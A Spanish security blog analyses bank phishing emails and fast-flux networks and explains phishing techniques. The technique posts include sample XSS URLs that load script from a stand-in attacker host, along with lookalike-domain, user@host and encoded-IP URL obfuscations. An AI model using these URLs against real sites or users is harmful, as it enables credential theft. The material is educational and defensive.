Scam & Seglog

Siguiendo el Scam

2011-01-21T10:01:00.000+01:00

El Scam anterior te llevaba a una URl de un dominio griego donde te redirigía a una WebSpoofing que simulaba la pantalla de solicitud de credenciales para ingresar en la entidad bancaria bajo el dominio: ograe.ru

Si seguimos nos presenta un nuevo formulario solicitando más información

y se traga lo que pongas, lo único que quieren es la clave y la firma supongo que para hacernos un ingreso :-))))

Nuevo Scam bancario

2011-01-21T07:57:00.003+01:00

Este nuevo intento de phishing a través de un SCAM emplea el gacho de devolución de un 15% del gasto en tarjetas de crédito. Intentan dirigirte a una Web Spoofing que simula la entidadd bancaria:

La cabecera técnica es la siguiente:

X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0xO0Q9MTtTQ0w9Mw==
X-Message-Status: n
X-SID-PRA: CAJA MADRID
X-AUTH-Result: NONE
X-Message-Info: JGTYoYF78jHMGSxvvqv8kHrG3ygPAC129Yts6koUNJ0OgCniFl6gk1vj6QPeV5jtTUDKRHv7W0q3fxXnRCUDHBWd5mConabfGUUh/yn2DT8=
Received: from weball.ru ([77.221.156.210]) by bay0-mc4-f26.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);
    Thu, 20 Jan 2011 05:51:55 -0800
Received: from root by weball.ru with local (Exim 4.63)
    (envelope-from )
    id 1PfulI-0004y6-VS
    for ~~xxxxxxxxx~~@hotmail.com; Thu, 20 Jan 2011 16:41:16 +0300
To: xxxxxxxxx@hotmail.com
Subject: Te devolvemos 15% de todas las compras realizadas con una de tus tarjetas. HICVRDI.
From: CAJA MADRID
Content-Type: text/html
Message-Id:
Date: Thu, 20 Jan 2011 16:41:16 +0300
X-SA-Exim-Connect-IP:
X-SA-Exim-Mail-From: root@weball.ru
X-SA-Exim-Scanned: No (on weball.ru); SAEximRunCond expanded to false
Return-Path: root@weball.ru
X-OriginalArrivalTime: 20 Jan 2011 13:51:55.0286 (UTC) FILETIME=[32E23360:01CBB8A9]

El redireccionamiento es a:

Rooted CON 2011

2010-12-28T17:37:00.001+01:00

Los próximos días 3, 4 y 5 de marzo de 2011,se celebrará en Madrid el Congreso de Seguridad Informática Rooted CON.
En el mismo se tratan temas y charlas, pero no exclusivamente limitadas, a:

Hacking, cracking, phreaking, virii, WiFi, Voz sobre IP, GSM...
Ingeniería inversa, debugging, hooking, fuzzing, exploiting,...
Herramientas o técnicas defensivas y ofensivas punteras.
Seguridad en "la nube", seguridad y hacking en entornos virtuales, productos y servicios en "la nube", ...
Técnicas de criptografía, esteganografía, canales subliminales, ...
Ciencia forense, investigación y técnicas antiforense.
Redes, protocolos y hacking de capas 2 y 3, encapsulación, ...

Rooted CON 2011

No cON Name vuelve

2010-09-23T17:49:00.000+02:00

2010-03-22T07:48:00.005+01:00

ROOTED CON 18-20 MARZO 2010

3 Jornadas de lujo y esperemos que tengan una continuidad, lo mejor el conjunto y el flujo de información que se dió, las ponencias, los RootedPanel (Reforma del código Penal español con Javier Ribas, Carlos Sánchez Almeida, Francisco Marco y Javier López, e Historia del Hacking con "Hackers Históricos" - Grupo Apòstols)
HL:

* RootedCON
* #rooted2010, #rootedcon, #rootedcon2010

FAST FLUX SERVICE NETWORKS

2009-12-04T10:55:00.003+01:00

La “Internet Corporation for Assigned Names and Numbers” (ICANN) describe “Fast Flux” como el rápido y repetido cambio de los Hosts y/o en los registros de recursos del Servidor de Nombres de una zona DNS, lo que da un cambio rápido de dirección IP del Host obtenido en la resolución del nombre de dominio solicitado (registro “A”) o servidor de nombres (registro “NS”). El objetivo de esta técnica es la no localización de un Sitio Web apoyándose en la resolución de nombres de dominios de los Servidores DNS funcionando sobre una red de máquinas comprometidas, utilizando canales jerárquicos de comunicaciones encriptados y técnicas de proxy. La variedad de usos ilícitos engloba desde Pornografía Infantil, Captación de credenciales (Phishing), Fraudes, Robo de Identidades, Venta de artículos ilegales, Propiedad Intelectual, SPAM, Difusión de malware, Denegaciones de Servicio, entre otros. El objetivo es ocultar las actividades delictivas a través de direcciones IP que van rotando en cuestión de segundos contra un mismo dominio, lo que impide localizarlas para poder bloquearlas al dificultar su identificación.

Existen varias técnicas para conseguir este propósito siendo las tres principales:

· Fast Flux básico, donde la direcciones IP de los sitios Web maliciosos son cambiadas.

· Name Server (NS) Fluxing, donde las direcciones IP de los Servidores de nombre DNS son cambiados.

· Double Flux, donde las direcciones IP de los sitios Web y los Servidores de nombre son cambiados.

Cuando un servidor tenía un exceso de carga se precisaba el poder balancear la carga con varios servidores (Host) que realicen la demanda, pudiéndose implementar con un equipo especializado denominado “load-balancer”, pero existe otro método para el caso que es la configuración “Round Robin DNS”.

Este objetivo en principio lícito de optimización de recursos ha sido aprovechado como método de ocultación de los hosts de resolución de los nombres de dominio. El objetivo de esta técnica es que la resolución de un nombre de dominio tenga múltiples asignaciones de direcciones IP (centenares e incluso miles). Las direcciones IP son constantemente intercambiadas usando combinaciones de “Round-robin DNS” (balanceo de carga de direcciones IP) junto con “Time to live” (TTL) muy cortos para registros de recursos “Resource Records” (RR).

Los nombres de los sitios Web pueden ser asociados con un nuevo conjunto de direcciones IP en frecuencias de pocos minutos. Así que los equipos que se conecten una vez pasado ese intervalo a esos sitios Web realmente se conectan a máquinas distintas pudiendo enmascarar en algunas de ellas las acciones ilícitas como la distribución de malware.

Se suele garantizar en el sistema de máquinas comprometidas un buen ancho de banda y la disponibilidad del servicio para sus fines delictivos, sustituyendo o eliminando aquellos nodos que no responde a su propósito.

Además suelen añadir una segunda capa para aumentar la seguridad y provocar el error que es la redirección a máquinas intermedias “Blind Proxy”, de forma que dificulta enormemente los intentos de rastreo para mitigar los nodos de la red de servicios Fast Flux. Lo que está sucediendo es que las numerosas direcciones IP que constantemente están sirviendo no provienen directamente de los hosts que existen en los registros de recurso ya que estos solo fluctúan entre muchos Hosts referentes o proxy que a su vez envía el contenido a otro grupo de servidores finales.

“Fast-flux motherships” son los elementos de control nodrizas para gestionar los servicios de red Fast Fllux, equivalente a los C&C “Command and Control” de las BotNets convencionales pero con notables ventajas. El “Fast Flux mothership” está oculto por los nodos proxy de Fast Flux que son los que responde a la víctima. Se observa que estos nodos nodriza operan con éxito durante largos periodos de tiempo en el medio, sirviendo tanto como alojadores de servicios Web como de Servidores de nombre de dominio, con configuraciones de servidor de alojamiento Web capaz de controlar el contenido de miles de dominios en un único Host.

Hasta finales de marzo de 2007 se conocía solo la existencia de dos de hosts nodriza sirviendo los miles de dominios en flux (cambio), lo que llevaba a pensar que esta técnica fue desarrollada y utilizada por un pequeño número de grupos e incluso un solo grupo. Encontrándose como dominios más utilizados en Fast flux los TLDs “.hk” e “.info”, si bien el resto de dominios entre los que esta “.com” también son utilizados.

Se distinguen dos tipos de técnicas de Redes Fast Flux: “Single Flux” (FF) y “Double Flux” (DF).

SINGLE FLUX (Flujo único): Se utiliza para alojar sitios Web referentes. Cada una de estas direcciones IP, que se van asignando a los dominios, corresponden a máquinas que previamente han sido comprometidas con algún código malicioso, formando parte de una Botnet. Los Bots de esta red de servicios no alojan el contenido del cliente Fast Flux sino que actúan de puente redirigiendo el tráfico al servidor Web donde el cliente de Fast Flux aloja las actividades ilegales o no autorizadas.

DOUBLE FLUX (Doble flujo): Se utiliza para alojar Servidores de Nombre de Dominio. Los Bots de esta red de servicios utilizan referentes del servidor de nombres para el cliente de Fast Flux. Estos servidores de nombres envían solicitudes DNS a servidores de nombres ocultos que alojan zonas que contienen registros de recursos DNS “A” para un conjunto de sitios web referentes. Los servidores de nombres ocultos no devuelven respuestas a través de su servidor de nombres de referencia sino que contestan directamente al host que realiza la consulta. Es decir es una evolución avanzada del “Single Flux” no solo cambiando las direcciones IP asociadas con el nombre de dominio “fully-qualified domain name” (FQDN), sino también los cambio de las direcciones IP de los servidores DNS (por ejemplo, los registros NS) que a su vez se usa para buscar la dirección IP del nombre de dominio completo.

En una modalidad de ataque, se registra un nombre de dominio (para una red de servicios Flux) para alojar sitios Web ilegales (webilegal.tld) y un segundo nombre de dominio (o más) para que la red de servicios Flux proporcione el la resolución de los nombres de dominio (redserviciodenombre.tld). Se asocia estos dominios con su operador de red de servicios Fast Flux. El operador de la red de servicios Fast Flux utiliza programas para cambiar rápidamente la información del servidor de nombres en los archivos de registro que el registrador mantiene para estos dominios, especialmente:

• Cambia las direcciones IP de los servidores de nombres de dominio para que señalen a diferentes hosts del dominio redserviciodenombre.tld

• Define el valor del tiempo de vida (TTL) en los registros de direcciones para estos servidores de nombres con un valor muy pequeño (de 60 a 180 segundos).

Los registros de recursos asociados con un dominio de servidor de nombres utilizado en el alojamiento Fast Flux podrían ser similar en un archivo de zona TLD como:

$TTL 120 ; Time To Live (2 minutos)

webilegal.tld NS NS1. redserviciodenombre.tld

webilegal.tld. NS NS2. redserviciodenombre.tld

webilegal.tld. NS NS3. redserviciodenombre.tld

…

NS1. redserviciodenombre.tld. A 194.146.205.1

NS2. redserviciodenombre.tld. A 194.146.205.2

NS3. redserviciodenombre.tld. A 194.146.205.3

Si nos fijamos vemos que el tiempo de vida (TTL) de los registros de recursos es muy breve (120 segundos). Cuando transcurre ese TTL, la programación aplica un nuevo conjunto de registros “A” para los servidores de nombres que sustituye al anterior:

$TTL 120 ; Time To Live (2 minutos)

webilegal.tld. NS NS1. redserviciodenombre.tld

webilegal.tld. NS NS2. redserviciodenombre.tld

webilegal.tld. NS NS3. redserviciodenombre.tld

…

NS1. redserviciodenombre.tld. A 81.95.145.200

NS2. redserviciodenombre.tld. A 193.93.235.21

NS3. redserviciodenombre.tld. A 193.93.235.22

Evidentemente el tiempo para localizar y cerrar los Host servidores de nombres que dan soporte a esta técnica de Fast Flux es sumamente escaso. Además los registros de recursos en redserviciodenombre.tld apuntan a Hosts referentes o proxy en lugar de los Bots que proporcionan la resolución de nombres para webilegal.tld. Los hosts referentes escuchan en el puerto 53 y dirigen las consultas DNS a un Bot "DNS" que aloja un archivo de zona para webilegal.tld. El Bot "DNS" resuelve el nombre del dominio del sitio web fraudulento a la dirección IP de un Host de la red de servicios web Flux y devuelve el mensaje de respuesta directamente al equipo que realiza la consulta. En este momento, la dirección IP del Bot DNS es conocida sólo por un grupo de Hosts referentes, y las direcciones IP de los referentes cambian cada 120 segundos.

El alojamiento “Double Flux” añade un nivel adicional empleando Bots en la red redserviciodenombre.tld y cambiando rápidamente los registros “A” de los Hosts del servidor web referente en la red webilegal.tld. Los registros de recursos “A” de los servidores web referentes se configuran también con TTL breves. Cuando transcurre el TTL de los Hosts del servidor web, la automatización del operador de la red de servicios Fast Flux garantiza de nuevo que un nuevo conjunto de registros “A” para los servidores Web reemplaza al conjunto existente: Por tanto, el período durante el que es posible identificar y cerrar los servidores web referentes que participan en este ataque Fast Flux es muy reducido. Los registros asociados con el sitio web ilegal podrían aparecer en archivo de zona alojado en un Bot DNS en la red redserviciodenombre.tld como:

webilegal.tld. 120 IN A 194.146.207.1

webilegal.tld. 120 IN A 91.198.71.15

webilegal.tld. 120 IN A 81.95.148.135

webilegal.tld. 120 IN A 194.110.69.21

Observe de nuevo que se define un tiempo de vida (TTL) para cada registro de recursos a muy breve (en el ejemplo, 120 segundos). Transcurrido el TTL, los registros de recursos se modificarán automáticamente para apuntar a otros Bots que alojan este sitio web ilegal. Sólo unos minutos después, en el archivo de zona se podría leer:

webilegal.tld. 120 IN A 194.146.207.101

webilegal.tld. 120 IN A 91.198.71.18

webilegal.tld. 120 IN A 194.110.69.1

webilegal.tld. 120 IN A 194.146.205.1

Los efectos combinados de los registros A que se actualizan con rapidez en la zona webilegal.tld y los registros A del servidor de nombres en la zona TLD son de una eficacia frustrante, ya que consiguen mantener los sitios ilegales en funcionamiento durante períodos más prolongados que los de los sitios que no utilizan Fast Flux.

VI Foro de las Evidencias Electrónicas

2009-05-21T09:33:00.002+02:00

Lugar: Teatros del Canal, Calle Cea Berbúdez 1 (Sala Polivalente), Madrid. Fecha: 03 junio 2009

Este año se aleja de las clásicas ponencias de los participantes intentando buscar la interactividad entre los asistentes, a través de siete paneles de diálogo. Este foro trata de explicar la coyuntura que se da en el paso de una sociedad analógica a una sociedad digital. Para evitar la inseguridad jurídica que esto plantea (cyberdelincuencia, trazabilidad de las transacciones electrónicas, etc.).
Entre los ponentes figurarán jueces y fiscales; personalidades de los cuerpos y fuerzas de seguridad del Estado; expertos en caligrafía y biometría; o usuarios. Asimismo, se hablará sobre Federación de identidades en la Administración Electrónica y en la Sociedad; la titularidad de los derechos de autor; y experiencias tecnológicas. Los portavoces procederán de organismos públicos (Audiencia Nacional, Ministerio del Interior, Cuerpo Nacional de Policía, Guardia Civil, Ministerio de la Presidencia, Agencia Española de Protección de Datos, Universidad Autónoma de Madrid, entre otros), así como de entidades privadas (Banco Sabadell, Colegio General de Médicos de España, Grupo BBVA, Endesa, Symantec, T-Systems, Cybex, Secuware, S21Sec, etc).
La asistencia es gratuita, la inscripción se puede realizar a través de la Web del evento: http://www.foroevidenciaselectronicas.org/form/formulario.html

Variables del Phishing - Vulnerabilidades de los clientes

2008-05-04T23:25:00.003+02:00

El uso de sofisticados clientes Web para navegar, como cualquier software comercial, son a menudo vulnerables a ataques. Cuantas más funcionalidades incorpore el navegador, es más probable que exista un bug que pueda ser explotado por un atacante para acceder, u observar, información confidencial de la victima.
Mientras que los vendedores del software hacen grandes esfuerzos para parchear las vulnerabilidades, los usuarios particulares aplican rara vez dichas medidas. Aunado a la capacidad de instalar agregaciones (tales como flash, RealPlayer y otros medios embebidos) implican nuevas oportunidades de ataque.
Similar a las amenazas de los virus y gusanos, estas vulnerabilidades se pueden explotar de diversas maneras. Muchos de los ataques no se pueden bloquear por los antivirus pues son a menudo mucho más duros de detectar y por lo tanto de prevenir (P.e. la etapa en la cual funcionaría el antivirus, sería después del ataque y solamente si el atacante intenta instalar un troyano o un Keylogger conocido).
Ejemplo: URL del Microsoft Internet Explorer que funciona mal por la inserción de un carácter (en este caso 0x01 - representado como la secuencia escape %01) dentro de la sección del Username del Friendly Login URL, redirigiría a un usuario al servidor de los atacantes, pero los caracteres después de %01 no se exhibirían en el campo de direcciones del navegador. Por lo tanto este ataque se podía utilizar para ofuscar el URL de los atacantes.

Variables del Phishing - Esnifando los datos de la victima

2008-05-04T23:12:00.003+02:00

Un viejo favorito entre la comunidad hacker y cada vez más popular entre los Phishers, es el uso de Key-loggers y screen-grabbers para observar datos confidenciales de clientes que se introducen en aplicaciones Web.

Esta información se recoge localmente y es recuperada por el atacante por los métodos siguientes:

• Flujo continuo de datos (p.e. se envían los datos tan pronto como se generen) usando un previo par de envió/recepción de datos. Para hacer esto, el atacante debe a menudo mantener una conexión abierta a la computadora de la victima.

• Recolección y procesamiento por lotes de la información para la subida al servidor del atacante. Esto se puede hacer con protocolos tales como ftp, HTTP, Smtp, etc.

• Recolección por puerta trasera por el atacante. El software malicioso permite que el atacante conecte remotamente con la máquina del cliente y coja los datos a medida que los precise.

1- Key-loggers: El propósito de los Keyloggers es observar y registrar toda tecla presionada por la victima, especialmente, cuando den datos de autentificación a las entidades objetivo. Con esta información en poder del Phisher puede, más adelante, utilizarla en su beneficio. Los Keyloggers pueden ser objetos pre-compilados que observan todas las teclas presionadas, sin importar el uso o el contexto (p.e. podrían ser utilizados para observar al cliente que usaba un procesador de texto para redactar un documento), o pueden ser escritos en código scripting del navegador para observar las teclas pulsadas según el contexto del navegador Web.

2- Screen-grabbers: Algunos ataques sofisticados de Phishing hacen uso de código diseñado para tomar un “pantallazo” del navegador para visualizar los datos suministrados a la aplicación Web. Esta funcionalidad se utiliza para superar algunas de las medidas seguras que están incorporando las entidades bancarias para prevenir el uso de Keyloggers. En muchos casos, solamente se requiere una ventana relevante y el software del Phisher capturará solamente estos datos, así las transferencias de subidas serán más pequeñas y rápidas.

Variables del Phishing - Ataque oculto

2008-05-04T23:07:00.003+02:00

Más allá de las técnicas de la ofuscación ya mostradas, un phisher puede hacer uso del HTML, DHTML y de otros códigos programables que pueden interpretar los navegadores de Internet de los clientes y manipular la información visible en ellos. En muchos casos el atacante utilizará estas técnicas para falsear el contenido (particularmente la fuente del contenido de la página) simulando ser del sitio verdadero

Los vectores más comunes incluyen:

1. Marcos ocultos: Los marcos es un método popular de ocultar el ataque debido a la uniformidad de los navegadores y su fácil codificación. Por ejemplo, se definen dos marcos. El primer marco contiene la información legítima del sitio URL, mientras que el segundo marco - ocupando el 0% del interfaz del browser - referencia el contenido elegido por los Phishers. La página enlazada dentro del marco oculto se puede utilizar para llevar el contenido adicional (p.e. contenido de eliminación de la página o substitución gráfica), recibiendo la información confidencial tal como SessionID o algo más nefasto; por ejemplo ejecutar código de grabación de la pantalla y grabación de pulsaciones de teclado de los códigos secretos. Este ataque se apoya:

· Ocultar el origen del atacante. Solamente la URL del marco principal será visible desde el interfaz del navegador a menos que el usuario siga un enlace con el atributo destino a “_top”.

· Proporcionan una falsa seguridad HTTPS (que fuerza el browser a exhibir un candado o una llave similar a sitio seguro) para el contenido de los sitios, mientras que todavía se usa el HTTP inseguro para el de la página oculta y sus operaciones.

· Ocultando código HTML a la victima. Los clientes no podrán ver el código oculto de las páginas con las funciones estándares ver origen de la fuente.

· Carga imágenes y contenido HTML en segundo plano para su uso maliciosa más tarde.

· Las propiedades de la página solo mostraran en la mayoría de navegadores los datos del marco visible.

· Almacenar e implementar operaciones en segundo plano que informarán al atacante de los movimientos de la victima en el sitio real.

· Combinado con programación del navegador, es posible variar la barra de herramientas del mismo; incluyendo la información de URL y cabeceras de página.

2. Anulando contenido de páginas: Existen varios métodos para eliminar el contenido de una página. Uno de los métodos más populares es insertar contenido falso dentro de una página es utilizar la función de DHTML - DIV. La función del DIV permite que un atacante ponga el contenido en un “contenedor virtual”, dando una posición y un tamaño absolutos con el método del STYLE, puede ser colocado para ocultar o reemplazar (posicionándolo encima) el contenido subyacente. Este contenido malévolo se puede enviar con una URL larga o refiriéndose a un script almacenado. Este método permite que un atacante construya una página completa (incluyendo gráficos y los elementos de auxiliares de código script) encima de la página verdadera.

3. Substitución gráfica: Mientras que es posible sobreescribir el contenido de la página fácilmente con múltiples métodos, un problema para los Phishers es el de las pistas visuales específicas del navegador a un ataque. Estas pistas incluyen la URL presentado dentro del campo de direcciones, el candado seguro que representaba un HTTPS de conexión cifrada, y el origen de la página. Un método común usado para vencer estas pistas visuales está con el uso de los scripting del navegador (tales como Javascript, VBScript y Java) para posicionar gráficos especialmente creados con la información falsa. Un ejemplo: el atacante utiliza una barra de direcciones y un candado seguro falsos cuidadosamente colocados en la zona para ocultar la información verdadera. Mientras que el Phisher debe utilizar gráficos adecuados al software del navegador, es trivial para realizar esta falsedad de Web que los atacantes determinen el tipo del navegador y la versión exacta con simples consultas de código. Así el atacante puede preparar las imágenes para una gama de navegadores usuales y preparar su página para que se utilicen las imágenes apropiadas.

Es importante observar que los ataques de Phishing en el pasado han combinado la substitución gráfica con código scripting adicional para falsificar otra funcionalidad del browser. Los ejemplos incluyen:

· Implementando funcionalidad click-derecho y menú acceso.

· Presentando falsos pop-ups igual que lo haría el verdadero navegador o la Aplicación de la Web

· Exhibiendo falsos certificados SSL cuando visualizamos las propiedades de seguridad, a través del uso de imágenes

· Usando simples comandos embebidos de HTML, un atacante puede secuestrar el escritorio del cliente entero y construir un interfaz falso para capturar y para manipular lo que ve el cliente. Se hace esto usando los comandos window.createPopup() y popup.show().

Variables del Phishing - Preset Session

2008-05-04T23:01:00.002+02:00

Dado que los protocolos HTTP y HTTPS son protocolos desautenticados, las aplicaciones Web deben utilizar métodos de seguimiento de los usuarios a través de sus páginas y controlar también el acceso a recursos que requieran la autenticación. La manera más común de control es utilizar identificadores de Sesión (SessionID). Estos SessionID se pueden aplicar a través de cookies, campos ocultos o de los campos que figuran dentro de las URL de la página
Muchas aplicaciones Web implementan sistemas débiles de control de identificación de Sesión y permitirán a los clientes de conexión definir la SessionID. La aplicación de Web chequeara al usuario que utiliza SessionID, pero le requerirá generalmente al usuario a identificarse (por ejemplo. información de identificación por un formulario de entrada) antes de conseguir acceso al contenido "restringido" de la página.
En esta clase de ataque el mensaje de phishing contiene una conexión Web al servidor verdadero de la aplicación, pero contiene también un campo predefinido de SessionID. El sistema de atacadores sondea constantemente al servidor de la aplicación para una página restringida (por ejemplo. una página de banca electrónica que permita las transferencias de fondos) utilizando el SessionID. Hasta que un usuario válido autentique contra esta SessionID, el atacador recibirá los errores del servidor Web (por ejemplo. 404 file not found, 302 server redirect, etc.).
El phisher debe esperar hasta que un receptor del mensaje siga el enlace y se autentifique la SessionID. Una vez autentificado, el servidor de la aplicación permitirá cualquier conexión que utiliza el SessionID autorizado a conseguir el acceso al contenido restringido. Por lo tanto, el atacador puede utilizar una SessionID fija para conseguir el acceso a una página restringida para llevar su ataque.

Variables del Phishing. • Cross-Site scripting

2008-03-17T19:51:00.002+01:00

El ataque “Cross-Site scripting “(comúnmente referido a CSS o XSS) esta basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. El problema es que normalmente no se valida correctamente. Esta vulnerabilidad puede estar presente de forma directa (foros, mensajes de error) o indirecta (redirecciones, framesets). Cada una se trata de forma diferente. En general, estas técnicas de CSS son el resultado de un desarrollo pobre de aplicaciones WEB.
Mientras hay numerosos vectores para el llevar al cabo un ataque de CSS, los Phishers pueden usar ataques de URL formateadas. Los formatos típicos para la inyección de CSS en URL válido incluyen:

i. La sustitución integra del protocolo de transferencia de hipertexto tal como:
“http://mibanco.com/ebanking?URL=http://sitio.com/fakepage.htm”

ii. Inline conteniendo código embebido, tal como:
“http://mibanco.com/ebanking?page=1&client=< script>sitiospoof...”

iii. Forzar la página para cargar código externo, tal como:
“http://mibanco.com/ebanking?page=1&response=malsitio.com%21evilcode.js&go=2”
Por ejemplo: se recibe en un correo electrónico de un Phishers la siguiente URL:
“http://mibanco.com/ebanking?URL=http://sitio.com//fakepage.htm”
Mientras el cliente es dirigido verdaderamente y es conectado a la aplicación verdadera del Web de MiBanco, debido a la mala codificación de la aplicación del banco, el componente de ebanking aceptará una URL arbitraria para la inserción del contenido de esa localización. Una vez insertado el código spoof dentro de la página, que podría ser el formulario de autenticación, el phisher ha logrado controlar una página dentro de un servidor externo (http://sitio.com//fakepage.htm).
Desgraciadamente, al igual que con la mayoría de las vulnerabilidades de CSS, el cliente no tiene manera de autentificar dicha página. Mientras que en el ejemplo la URL puede parecer obvia, el atacante la podría ofuscar fácilmente utilizando las técnicas explicadas anteriormente. Por ejemplo, http://stio.com/fakepage.htm puede ser:
“http%3A%2F%2F3515261219%C0%AEfakepage%2Ehtm”

Variables del Phishing. Ofuscación de URL

2008-03-17T19:42:00.002+01:00

Muchos ataques de Phishing convencen al receptor del mensaje a seguir un hiperenlace (URL) al servidor del atacante, sin que se den cuenta de que han sido “duped” (ofuscados). Desgraciadamente los phishers tienen acceso a un arsenal cada vez más grande de métodos para ofuscar el destino final de la Web. Los métodos más comunes de la ofuscación de URL incluyen:
1. Dominios de nombre erróneos: Es Uno de los métodos de ofuscación más trivial es a través del registro y el uso determinados nombres de dominio maliciosos. Considere una entidad MiBanco con el dominio registrado “mibanco.com” y la Web Site asociada para transacciones “http://privado.mibanco.com”. El Phisher podría establecer un servidor que utilizará cualquiera de los nombres siguientes tendiendo a ofuscar el servidor verdadero del destino:

• http://privado.mibanco.com.tk
• http://mibanco.privado.com
• http://privado.mibanca.com o aún http://privado.mibánco.com
• http://privado.mibanco.sitiospoof.com

Es importante notar que los registradores de dominio están internacionalizados sus servicios, es posible registrar los nombres del dominio en otros idiomas y sus juegos de caracteres específicos. Por ejemplo, la cirílica "O" parece idéntica al estándar ASCII "O" pero se puede utilizar para propósitos diferentes de registro de dominio – tal como una compañía que registró Microsoft.com en Rusia hace algunos años. Finalmente, resaltar que aún el juego de caracteres estándar ASCII permite ambigüedades tales como la mayúscula “I" y la minúsculas "L". (I Vs l en arial)

2. Friendly login de URL’s: Muchas implementaciones comunes del navegador de Internet tienen en cuenta URL’s complejos que puede incluir información de autenticación tal como un nombre de login y la contraseña. En general el formato es URL: //usuario:contraseña@hostname/path. El Phishers puede sustituir los campos del nombre de usuario y la contraseña con detalles asociados a la entidad del objetivo. Por ejemplo el URL siguiente http://mibanco.com:ebanking@sitiospoof.com/phishing/fakepage.htm pone el nombre de usuario = mibanco.com, la contraseña = ebanking y el hostname de destino = sitiospoof.com. Esta URL de entrada amistosa puede engañar exitosamente a muchos clientes en el pensamiento que ellos visitan realmente la página legítima de MiBanco. A causa de su éxito, en muchas versiones actuales de navegadores ha dejado de funcionar este método de ofuscación.

3. Acortación de la URL por terceros: Debido a la longitud y la complejidad de muchas URL’s de Web, combinado con la manera que la URL puede ser representada y visualizada (p.e. los espacios extra y saltos de línea en la URL), servicios de terceros han aparecido ofreciendo servicios gratuitos designados a proveer de URL’s más cortos. Una combinación de la ingeniería social con una URL deliberadamente rota, larga o inexacta es usado por los Phishers para ofuscar el destino verdadero. Los servicios gratuitos más populares como http://smallurl.com y http://tinyurl.com.
Por ejemplo:

4. Ofuscación de URL: Para asegurar el apoyo a los idiomas locales en el software del Internet tal como navegadores de Internet y Clientes de correo electrónico, la mayoría de los software soportan alternativas de sistemas de codificación. Es una práctica trivial para un Phisher el ofuscar la verdadera naturaleza de una URL suministrada que utiliza una (o una combinación) de estos esquemas de codificación. Estos esquemas de codificación tienden a ser soportados por la mayoría de los navegadores de Internet, y pueden ser interpretados de maneras diferentes por Servidores Web y sus aplicaciones más comunes.
Los esquemas típicos de codificación:

· Escape encoding: Escape-Codificar, o se refiere a veces a tanto por ciento-codificado, es el método aceptado de representar los caracteres dentro de una URL que puede necesitar una sintaxis especial para ser correctamente interpretada. Esto se logra codificando el carácter especial para ser interpretado con una sucesión de otros tres caracteres. Este trío consiste en el carácter del porcentaje "%" seguido por dos dígitos hexadecimales que representan el código de octeto del carácter original. Por ejemplo, el juego de caracteres EEUU-ASCII representa un espacio con el código de octeto 32, o hexadecimal 20. Así su representación de URL-encoded es “% 20”.

· Unicode encoding: Unicode encoding es un método de referenciar y almacenar los caracteres con múltiples bytes proporcionando un número referencial para cada carácter no propio del idioma ni de la plataforma. Se diseña para permitir un Juego de caracteres Universal (UCS) y abarcar la mayor parte de los sistemas de escritura del mundo. Muchos estándares modernos de comunicación (tal como XML, Java, LDAP, el Javascript, WML, etc.), Sistemas operativos y clientes/servidores Web utilizan los valores de Unicode. Unicode (UCS-2 ISO 10646) es un sistema de codificación de caracteres de 16 bits que contiene todos los caracteres (216 = 65.536 caracteres diferentes) de uso corriente en los idiomas más importantes. Las plataformas de Microsoft Windows codifican los caracteres de Unicode en el formato siguiente - %u0000 – por ejemplo %u0020 representa un espacio, mientras %u01FC representa Ǽ y %u221E es ∞.

· Inapropiado UTF-8 encoding: Uno de la mayoría de los formatos comúnmente utilizados, Unicode UTF-8, tiene la característica de preservar la gama repleta de los caracteres EEUU-ASCII. Esta gran flexibilidad proporciona muchas oportunidades para disfrazar los caracteres estándar en grandes secuencias de escape-encoded. Por ejemplo, el punto "." puede ser representado como %2E, o %C0%AE, o %E0%80%AE, o %F0%80%80%AE, o %F8%80%80%80%AE, o aún %FX%80%80%80%80%AE.

· Codificación múltiple: Varias guías y RFC explican con cuidado el método de decodificar los caracteres de escape-encoded e insinúa los peligros asociados con decodificar muchas veces y en múltiples capas de una aplicación. Sin embargo, muchas aplicaciones todavía analizan sintácticamente e inexacta muchas veces los datos escape-encoded. Consecuentemente, los Phishers pueden ofuscar aún más la información de URL codificando muchas veces los caracteres (y de formas diferentes). Por ejemplo, la barra inversa "\" se puede codificar como %25 originalmente, pero podría ser extendido a: %255C, o %35C, o %%35%63, o %25%35%63, etc.

5. Ofuscación del nombre del Servidor: La mayoría de los usuarios de Internet están familiarizados con los sitios y servicios por el nombre calificado del dominio, tal como www.mibanco.com. Un cliente de navegación por Internet necesita, para establecer la comunicación, que esta dirección sea resuelta a una dirección de IP, tal como 209.134.161.35 para llegar al Web Site de www.mibanco.com. Esta resolución de la dirección de IP se logra por servidores de nombre de dominio (DNS). Un Phisher puede utilizar la representación de la dirección de IP como parte de una URL para ofuscar el servidor y evitar posibles sistemas de filtro de contenido, y esconder el destino final. P.e. la URL: http://mibanco.com:ebanking@sitio.com/login.htm podría ser ofuscada como: http://mibanco.com:ebanking@210.134.161.35/login.htm. Mientras algunas victimas conocen la representación clásica de punteó-decimal de direcciones de IP (000.000.000.000), la mayoría de ellas no están familiarizadas con otras representaciones posibles. Utilizar estas otras representaciones de IP dentro de un URL, permiten oscurecer aún más el servidor de destino de una inspección regular.
Dependiendo de la aplicación que interpreta una dirección de IP, es posible que haya una variedad de caminos para codificar la dirección de otra manera que el formato clásico de punteó-decimal. Los formatos alternativos incluyen:

Dword: Significa doble palabra porque consiste esencialmente de dos "palabras" binarias de de 16 bits; pero se expresa en decimal (base 10),
Octal: La dirección es expresada en base 8
Hexadecimal: La dirección es expresada en base 16.

Estos formatos alternativos se explican mejor viendo un ejemplo.
Considere el URL http://www.sitio.com/, resolviéndose a 210.134.161.35. Esto se puede interpretar como:

decimal: http://210.134.161.35/
Dword: http: //3532038435/
Octal: http://0322.0206.0241.0043/
Hexadecimal: http://0xD2.0x86.0xA1.0x23/o aún http: //0xD286A123/
Mezclando formatos: http://0322.0x86.161.0043/).

Variables del Phishing. Man in the middle

2008-03-17T19:40:00.001+01:00

Es una de las variables más exitosas para obtener el control de la información y los recursos. El atacante se sitúa entre la victima y la aplicación Web e intercepta todas las comunicaciones entre ellos. Desde este punto puede observar y recolectar todas las transacciones
Tiene éxito tanto para comunicaciones HTTP como HTTPS. La victima conecta con el phisher como si fuera el sitio real, y este hace conexiones simultáneas al sitio real. EL phisher actúa como Proxy en tiempo real.
